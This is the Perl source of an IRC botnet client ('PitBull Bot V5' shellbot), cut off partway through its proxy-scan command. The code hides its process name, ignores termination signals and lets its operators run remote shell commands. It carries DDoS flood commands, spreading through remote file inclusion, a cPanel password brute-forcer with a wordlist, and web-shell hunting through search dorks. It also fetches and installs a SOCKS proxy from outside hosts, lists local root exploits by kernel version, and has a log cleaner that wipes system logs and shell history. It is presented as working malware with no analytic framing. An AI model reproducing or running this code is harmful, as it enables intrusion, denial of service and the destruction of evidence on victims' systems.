#--------------------------------------------------------------#
$server= 'master.indoirc.net' unless $server;
my $port= '6667';
my @channel= ("#Vicktor");
my @nickname = ("XDCC|");
my $nick = $nickname[rand scalar @nickname];
my $ircname = 'xdcc';
chop (my $realname = "VickT');
#--------------------------------------------------------------#
my $httpmodule;
my $usermodule;
my $lwpmodule;
my $filemodule;
#--------------------------------------------------------------#
my @cpanelpasswds = ("1","12","967qeikt","123","1234","12345","123456","1234567","12345678","123456789","1234567890","admin","root",
"pass","passwd","password","Pass","Passwd","PassWd","PassWord","pwd","login","Admin","admin","test","123123","1212",
"12341234","zxcvbnm","zxcvbn","zxcvb","zxcv","zxc","q1w2e3r4","q1w2e3","q1w2e3r4t5","1q2w3e4r5t","1q2w3e4r","1q2w3e",
"demo","morgan","ferrari","italia","usa","clinton","dart","call","asdf","asdfg","asdfgh","qazwsx","qazxsw","qwertyu",
"qwertyuiop","qwertyuio","qwertyu","qwerty","qwert","qwer","james","hosting","temp","test1","test12","test123","tester",
"testing","cpanel","default","Login","admin.","cpanels","web","master","webmaster","dark","support","darby","mail",
"dick","mary","evil","nissan","toyota","kingkong","superman","super","supra","data","service","server","weed","abc",
"abc123","hello","terror","binladen","europe","website","mypass","pass1","pass12","pass123","pass1234","passwd1");
#--------------------------------------------------------------#
# End here :)
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
eval "use HTTP::Request;"; if ($@) {
$httpmodule= " 4No";
}
else{
$httpmodule= " 4Yes";
}
eval "use LWP::UserAgent;"; if ($@) {
$usermodule= " 4No";
}
else{
$usermodule= " 4Yes";
}
eval "require LWP;"; if ($@) {
$lwpmodule= " 4No";
}
else{
$lwpmodule= " 4Yes";
}
eval "use FileHandle;"; if ($@) {
$filemodule= " 4No";
}
else{
$filemodule= " 4Yes";
}
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
#Connect
$server="$ARGV[0]" if $ARGV[0];
# Real psx! - by xeQt.
my $uid=`id -u`;
if ($uid =~ /^0$/)
{
$0=$xeQters."\0"x16;;
chdir($rootpath);
}
else
{
@processer=`ps x|grep -E "http|httpd|apache|apache2|mysql|postgrep|smbd"`; # Grab from real ps!
foreach $lines (@processer)
{
if (($lines =~ /\/(.+)/)&&($lines !~ /grep/i)&&($lines !~ /perl/i))
{
if (($lines!~/wget/i)&&($lines!~/curl/i)&&($lines!~/fetch/i)&&($lines!~/GET/i)&&($lines!~/lwp-download/i))
{
$bg=$1;
}
}
if (($bg =~ /^\//i) || ($bg =~ /^\/\//i) || ($bg =~ /^[.+?]$/i))
{
$bg="$bg";
}
else
{
$bg="/$bg";
}
if ((length($bg) <= 3) || ($bg =~ /.txt$/i))
{
$bg=$fakeps[rand scalar @fakeps];
}
$0="$bg"."\0"x16;;
chdir($userpath);
}
}
my $pid=fork;
exit if $pid;
die "Error: Fork(): $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {#342
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $server_con = $_[1];
my $port_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server_con",
PeerPort=>$port_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$server_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$port_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $server_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$server", "$port"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.31 The_PitBull\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth ) {
if (grep {$_ =~ /^\Q$pn\E$/i } @admins ) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
#-#-#-#-#-#-#-#-#
# PREFIX #
#-#-#-#-#-#-#-#-#
if ($args =~ /^(\Q$meunick\E|\!$prefix)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
}
#-#-#-#-#-#-#-#-#
# NICKNAME OPT.#
#-#-#-#-#-#-#-#-#
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@channel) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
#-#-#-#-#-#-#-#-#
# Commands #
#-#-#-#-#-#-#-#-#
# Show commands of the bot.
if ($funcarg =~ /^commands/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ [PitBull Bot V5 Commands List] 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ -----[Shellbot/Hacking Based]----- 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1admins ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1spread <rfi> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1milw0rm ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1packetstorm ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1portscan <host> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1logcleaner ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1md5 <hash> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1sendmail <subject> <sender> <recipient> <message> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1vnc <B-Class> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1boxip ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1socks5 ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1cleartmp ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1portchk <host> <port> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1proxy <a|t|e> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1rootable ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1modules ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1cpanel <host> <user> <port> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1visit <url> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1shellfind <c99/r57/mys/phm/rem> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ -----[IRC Based]----- 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1join <#channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1part <#channel> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1quit <reason> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1voice <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1devoice <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1halfop <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1dehalfop <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1op <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1deop <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ -----[DDos Based]----- 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1udpflood <host> <packetsize> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1httpflood <host> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1sqlflood <host> <time> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ -----[Flooding Based]----- 4@ 12 ] ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1msgflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1dccflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1ctcpflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1noticeflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1channelflood");
sendraw($IRC_cur_socket, "PRIVMSG $printl :!bot 7@ 1maxiflood <who> ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ [PitBull Bot V5 Commands List] 4@ 12 ] ");
}
# Shell finder based on the code of DiA/RRLF.
if ($funcarg =~ /^shellfind\s+(.*)/) {
my $type=$1;
my @searchTerm;
my @checkTerm;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ShellFinder 12] Started for finding 4 ".$type." 12shell ");
if($type eq "r57") {
push(@searchTerm, "inurl:r57.php");
push(@searchTerm, "\"[ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ]\"");
push(@searchTerm, "intitle:r57shell");
push(@checkTerm, "r57");
push(@checkTerm, "safe_mode");
}
elsif($type eq "c99") {
push(@searchTerm, "inurl:c99.php");
push(@searchTerm, "\"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout\"");
push(@searchTerm, "intitle:\" - phpshell\"");
push(@searchTerm, "intitle:\" - c99shell\"");
push(@checkTerm, "c99");
push(@checkTerm, "Safe-mode");
}
elsif($type eq "mys") {
push(@searchTerm, "\"Auto error traping enabled\"");
push(@searchTerm, "intitle:\"MyShell 1.1.0 build 20010923\"");
push(@checkTerm, "MyShell");
push(@checkTerm, "Echo commands");
}
elsif($type eq "phs") {
push(@searchTerm, "intitle:\"PHP Shell 1.5\"");
push(@searchTerm, "intitle:\"PHP Shell 1.6\"");
push(@searchTerm, "intitle:\"PHP Shell 1.7\"");
push(@searchTerm, "\"Enable stderr-trapping?\"");
push(@checkTerm, "PHP Shell");
push(@checkTerm, "Choose new working");
}
elsif($type eq "phm") {
push(@searchTerm, "\"PHPShell by Macker\"");
push(@searchTerm, "\"[ Main Menu ] [ PHPKonsole ] [ Haxplorer ]\"");
push(@checkTerm, "Haxplorer");
push(@checkTerm, "PHPKonsole");
}
elsif($type eq "rem") {
push(@searchTerm, "intitle:\"phpRemoteView: \"");
push(@searchTerm, "\"REMVIEW TOOLS\"");
push(@checkTerm, "phpRemoteView");
push(@checkTerm, "perms");
}
my $userAgent = LWP::UserAgent->new;
$userAgent->agent("User-Agent=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.5) Gecko/20061201 Firefox/2.0.0.5");
my @resultLinks;
foreach(@searchTerm) {
my $isLastPage = 0;
for(my $gPage = 0; ; $gPage++) {
if($isLastPage == 1) { last; }
my $gRequest = HTTP::Request->new(GET => "http://www.google.de/search?q=$_&start=$gPage"."0");
my $gResource = $userAgent->request($gRequest);
if($gResource->is_success) {
my @gContent = split("<div class=g>", $gResource->content);
if(@gContent < 10) { $isLastPage = 1; };
for(my $gPiece = 1; $gPiece < @gContent; $gPiece++) {
my $shellLink = substr($gContent[$gPiece], index($gContent[$gPiece], "href=\"") + 6);
$shellLink = substr($shellLink, 0, index($shellLink, "\""));
my $sRequest = HTTP::Request->new(GET => $shellLink);
my $sResource = $userAgent->request($sRequest);
if($sResource->is_success) {
if(index($sResource->content, $checkTerm[0]) != -1 && index($sResource->content, $checkTerm[1]) != -1) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ShellFinder 12] 4 [".$type."] 12Link: 4 ".$shellLink." ");
}
}
}
sleep 20; #wait 20 seconds so google dont think we are a bot
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ShellFinder 12] Google blacklisted! ");
}
}
}
}
# Show admins of the bot.
if ($funcarg =~ /^admins/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Admins 12] The Admins of the bot are : 4 @admins ");
}
# ModuleCheck to c wich we are using
if ($funcarg =~ /^modules/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] HTTP::Request: ".$httpmodule." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] LWP::Useragent: ".$usermodule." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] LWP: ".$lwpmodule." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] FileHandle: ".$filemodule." ");
}
# URL Visitor
if ($funcarg =~ /^visit\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ URLVisit 12] Visiting");
my $side=$1;
my $set = fix_url($side);
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; }
else {
eval "use HTTP::Request;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ URLVisit 12] HTTP::Request not found ");
}
eval "use LWP::UserAgent;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ URLVisit 12] LWP::UserAgent not found ");
}
my $siden=fix_url($side);
my $req=HTTP::Request->new(GET=>$siden);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
my $mrx=$response->content;
if ($response->is_success) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ URLVisit 12] Visited 4 ".$siden.".");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Error: ".$siden."");
}
}
exit;
}
}
# Spread the bot on a rfi. Make sure that your $spread is configured right !.
if ($funcarg =~ /^spread\s+(.*)/) {
$vuln = $1;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Spreader 12] Spreading bot on : 4 $vuln");
my $shellurl="http://".$vuln.$spread."?";
my $reqz=HTTP::Request->new(GET=>$shellurl);
my $ua=LWP::UserAgent->new();
my $response=$ua->request($reqz);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Spreader 12] Bot is Spreaded on : 4 $vuln");
}
# MD5 Decrypter by my friend iNs ;).
if ($funcarg =~ /^md5\s+(.*)/) {
&ice($printl,$1);
&gdata($printl,$1);
&redn($printl,$1);
&xpz($printl,$1);
&ben($printl,$1);
&alim($printl,$1);
&cry($printl,$1);
}
# Get the latest bugs from milw0rm.
if ($funcarg =~ /^milw0rm/) {
my @ltt=();
my @bug=();
my $x;
my $page="";
my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$socke>;
$page="@r";
close($socke);
while ($page =~ m/<title>(.*)</g){
$x = $1;
if ($x =~ /\<\;/) {
$x =~ s/\<\;/</g;
}
if ($x !~ /milw0rm/) {
push (@bug,$x);
}}
while ($page =~ m/<link.*expl.*([0-9]...)</g) {
if ($1 !~ m/milw0rm.com|exploits|en/){
push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
}}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Milw0rm 12] 12 Latest exploits : ");
foreach $x (0..(@ltt - 1)) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Milw0rm 12] 12 $bug[$x] - $ltt[$x]");
sleep 1;
}}
# Get the IP of the box
if ($funcarg =~ /^boxip/) {
$net = `/sbin/ifconfig | grep 'eth0'`;
if (length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet addr'`;
if (!length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet end.'`;
}
if (length($net))
{
chop($net);
@netip = split/:/,$net;
$netip[1] =~ /(\d{1,3}).(\d{1,3}).(\d{1,3}).(\d{1,3})/;
$ip = $1 .".". $2 .".". $3 .".". $4;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ IP 12] 12 IP of B0X : 4 ". $ip ." ");
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ IP 12] 12 IP of B0X : 4 Not founded ");
}
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ IP 12] 12 IP of B0X : 4 Error ");
}
}
#cPanel Bruter by xeQt modded by The_PitBull
if ($funcarg =~ /^cpanel\s+(\S+)\s+(\S+)\s+(\d+)/) {
my $haddr=$1;
my $cuser=$2;
my $cport=$3;
my $countcp=0;
eval "use IO::Socket;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] 12 IO::Socket Not Found"); return;
}
eval "use LWP::Simple;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] 12 LWP::Simple Not Found"); return;
}
eval "use MIME::Base64;"; if ($@) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ ModuleCheck 12] 12 MIME::Base64 Not Found"); return;
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ cPanelBruter 12] 12 Starting Bruter");
foreach my $P (@cpanelpasswds) {
$countcp++;
chomp $P;
$passwd = $P;
$authx = encode_base64($cuser.":".$passwd);
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$haddr", PeerPort => "$cport") || die "Error connect ro host\n";
print $sock "GET / HTTP/1.1\n";
print $sock "Authorization: Basic $authx\n";
print $sock "Connection: Close\n\n";
read $sock, $answer, 128;
close($sock);
if ($answer =~ /Moved/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ cPanelBruter 12] 12 Cracked ".$haddr.":".$cport." - l/p:".$cuser.":".$passwd." - Done.");
return;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ cPanelBruter 12] 12 Tested ".$countcp." password(s) without luck!");
}
#Auto Install Socks V5 using Mocks
if ($funcarg =~ /^socks5/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SocksV5 12] 12 Installing Mocks please wait 4");
system 'cd /tmp';
system 'wget http://switch.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz';
system 'tar -xvfz mocks-0.0.2.tar.gz';
system 'rm -rf mocks-0.0.2.tar.gz';
system 'cd mocks-0.0.2';
system 'rm -rf mocks.conf';
system 'curl -O http://andromeda.covers.de/221/mocks.conf';
system 'touch mocks.log';
system 'chmod 0 mocks.log';
sleep(2);
system './mocks start';
sleep(4);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SocksV5 12] 12 Looks like its succesfully installed lets do the last things 4 ");
#lets grab ip
$net = `/sbin/ifconfig | grep 'eth0'`;
if (length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet addr'`;
if (!length($net))
{
$net = `/sbin/ifconfig eth0 | grep 'inet end.'`;
}
if (length($net))
{
chop($net);
@netip = split/:/,$net;
$netip[1] =~ /(\d{1,3}).(\d{1,3}).(\d{1,3}).(\d{1,3})/;
$ip = $1 .".". $2 .".". $3 .".". $4;
#and print it ^^
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SocksV5 12] 12 Connect here : 4 ". $ip .":8787 ");
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SocksV5 12] 12 IP not founded ");
}
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ SocksV5 12] 12 ERROR WHILE INSTALLING MOCKS ");
}
}
# A portscanner, @portscan <host>
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Portscan 12] 12 Scanning for open ports on 4 ".$1." 12 started .");
foreach my $port (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $port, Proto =>
'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $port);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Portscan 12] 12 Open ports founded: @aberta");
} else {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Portscan 12] 12 No open ports foundend. ");
}
}
# A logcleaner, most effective when you are uid=0
if ($funcarg =~ /^logcleaner/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ LogCleaner 12] This process can be long, just wait");
system 'rm -rf /var/log/lastlog';
system 'rm -rf /var/log/wtmp';
system 'rm -rf /etc/wtmp';
system 'rm -rf /var/run/utmp';
system 'rm -rf /etc/utmp';
system 'rm -rf /var/log';
system 'rm -rf /var/logs';
system 'rm -rf /var/adm';
system 'rm -rf /var/apache/log';
system 'rm -rf /var/apache/logs';
system 'rm -rf /usr/local/apache/log';
system 'rm -rf /usr/local/apache/logs';
system 'rm -rf /root/.bash_history';
system 'rm -rf /root/.ksh_history';
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ LogCleaner 12] All default log and bash_history files erased");
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ LogCleaner 12] Now Erasing the rest of the machine log files");
system 'find / -name *.bash_history -exec rm -rf {} \;';
system 'find / -name *.bash_logout -exec rm -rf {} \;';
system 'find / -name "log*" -exec rm -rf {} \;';
system 'find / -name *.log -exec rm -rf {} \;';
sleep 1;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ LogCleaner 12] Done! All logs erased");
}
# A /tmp cleaner
if ($funcarg =~ /^cleartmp/) {
system 'cd /tmp;rm -rf *';
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ TMPCleaner 12] /tmp is Cleaned");
}
# Check if a host have a port open.
if ($funcarg =~ /^portchk\s+(.*)\s+(\d+)/) {
my $host=$1;
my $port=$2;
my $scansock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp', Timeout => 8);
if ($scansock)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ PortChk 12] Port: 4 ".$port." 12is open on the host 4 ".$host." ");
$scansock->close;
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ PortChk 12] Port: 4 ".$port." 12is closed on the host 4 ".$host." ");
}
}
# Chk The News from PacketStorm
if ($funcarg =~ /^packetstorm/) {
my $c=0;
my $x;
my @ttt=();
my @ttt1=();
my $sock = IO::Socket::INET->new(PeerAddr=>"www.packetstormsecurity.org",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET /whatsnew20.xml HTTP/1.0\r\n";
print $sock "Host: www.packetstormsecurity.org\r\n";
print $sock "Accept: */*\r\n";
print $sock "User-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
close($sock);
while ($page =~ m/<link>(.*)<\/link>/g)
{
push(@ttt,$1);
}
while ($page =~ m/<description>(.*)<\/description>/g)
{
push(@ttt1,$1);
}
foreach $x (0..(@ttt - 1))
{
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ PacketStorm 12] ".$ttt[$x]." ".$ttt1[$x]."");
sleep 3;
$c++;
}
}
if ($funcarg =~ /^rootable/) {
my $khost = `uname -r`;
my $currentid = `whoami`;
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] Currently you are ".$currentid." ");
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] The kernel of this box is ".$khost." ");
chomp($khost);
my %h;
$h{'w00t'} = {
vuln=>['2.4.18','2.4.10','2.4.21','2.4.19','2.4.17','2.4. 16','2.4.20']
};
$h{'brk'} = {
vuln=>['2.4.22','2.4.21','2.4.10','2.4.20']
};
$h{'ave'} = {
vuln=>['2.4.19','2.4.20']
};
$h{'elflbl'} = {
vuln=>['2.4.29']
};
$h{'elfdump'} = {
vuln=>['2.4.27']
};
$h{'expand_stack'} = {
vuln=>['2.4.29']
};
$h{'h00lyshit'} = {
vuln=>['2.6.8','2.6.10','2.6.11','2.6.9','2.6.7','2.6.13' ,'2.6.14','2.6.15','2.6.16','2.6.2']
};
$h{'kdump'} = {
vuln=>['2.6.13']
};
$h{'km2'} = {
vuln=>['2.4.18','2.4.22']
};
$h{'krad'} = {
vuln=>['2.6.11']
};
$h{'krad3'} = {
vuln=>['2.6.11','2.6.9']
};
$h{'local26'} = {
vuln=>['2.6.13']
};
$h{'loko'} = {
vuln=>['2.4.22','2.4.23','2.4.24']
};
$h{'mremap_pte'} = {
vuln=>['2.4.20','2.2.25','2.4.24']
};
$h{'newlocal'} = {
vuln=>['2.4.17','2.4.19','2.4.18']
};
$h{'ong_bak'} = {
vuln=>['2.4.','2.6.']
};
$h{'ptrace'} = {
vuln=>['2.2.','2.4.22']
};
$h{'ptrace_kmod'} = {
vuln=>['2.4.2']
};
$h{'ptrace24'} = {
vuln=>['2.4.9']
};
$h{'pwned'} = {
vuln=>['2.4.','2.6.']
};
$h{'py2'} = {
vuln=>['2.6.9','2.6.17','2.6.15','2.6.13']
};
$h{'raptor_prctl'} = {
vuln=>['2.6.13','2.6.17','2.6.16','2.6.13']
};
$h{'prctl3'} = {
vuln=>['2.6.13','2.6.17','2.6.9']
};
$h{'remap'} = {
vuln=>['2.4.']
};
$h{'rip'} = {
vuln=>['2.2.']
};
$h{'stackgrow2'} = {
vuln=>['2.4.29','2.6.10']
};
$h{'uselib24'} = {
vuln=>['2.4.29','2.6.10','2.4.22','2.4.25']
};
$h{'newsmp'} = {
vuln=>['2.6.']
};
$h{'smpracer'} = {
vuln=>['2.4.29']
};
$h{'loginx'} = {
vuln=>['2.4.22']
};
$h{'exp.sh'} = {
vuln=>['2.6.9','2.6.10','2.6.16','2.6.13']
};
$h{'prctl'} = {
vuln=>['2.6.']
};
$h{'kmdx'} = {
vuln=>['2.6.','2.4.']
};
$h{'raptor'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
$h{'raptor2'} = {
vuln=>['2.6.13','2.6.14','2.6.15','2.6.16']
};
foreach my $key(keys %h){
foreach my $kernel ( @{ $h{$key}{'vuln'} } ){
if($khost=~/^$kernel/){
chop($kernel) if ($kernel=~/.$/);
sendraw($IRC_cur_socket, "PRIVMSG $printl : 12[ 4@ Rootable 12] Possible Local Root Exploits: ". $key ." ");
}
}
}
}
#Pr0xy Scan
if ($funcarg =~ /^proxy\s+(.*)/) {
my @User_Agent = &Agent();
my $str = $1;
if ($str =~ m/^(a|anon|anonymous)$/i) { $str = "anonymous";}
